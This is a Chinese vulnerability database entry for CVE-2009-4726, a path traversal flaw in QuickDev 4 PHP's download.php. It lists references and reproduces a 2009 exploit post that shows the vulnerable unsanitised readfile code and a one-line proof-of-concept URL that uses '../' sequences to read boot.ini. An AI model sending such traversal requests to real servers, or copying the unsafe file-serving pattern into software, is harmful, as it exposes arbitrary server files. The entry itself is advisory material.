Quickdev 4 PHP 'download.php'脚本目录遍历漏洞

漏洞ID	1118243	漏洞类型	路径遍历
发布时间	2009-08-03	更新时间	2009-08-03
CVE编号	CVE-2009-4726	CNNVD-ID	CNNVD-201003-235
漏洞平台	PHP	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/9334
https://www.securityfocus.com/bid/42555
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-235

|漏洞详情

Quickdev4PHP中的download.php脚本存在目录遍历漏洞。远程攻击者可以借助file参数中的".."符号遍历任何目录并读取任意文件。

|漏洞EXP

#####################################################################################
[+] QuickDev 4 Php (download.php file) Arbitrary File Download
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#####################################################################################

[+] Download : http://sourceforge.net/projects/quickdev4php/files/

[+] Arbitrary File Download

 - Vulnerable code in download.php

--------------------------------------------------------------------------

$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
@readfile($file);
die();

--------------------------------------------------------------------------

 - PoC

   http://127.0.0.1/download.php?file=../../../../../../boot.ini

#####################################################################################

# milw0rm.com [2009-08-03]

|受影响的产品

Olivier michaud and Pierre-Yves QuickDev 4 Php 0

|参考资料

来源:VUPEN
名称:ADV-2009-2126
链接:http://www.vupen.com/english/advisories/2009/2126
来源:MILW0RM
名称:9334
链接:http://www.milw0rm.com/exploits/9334
来源:SECUNIA
名称:36130
链接:http://secunia.com/advisories/36130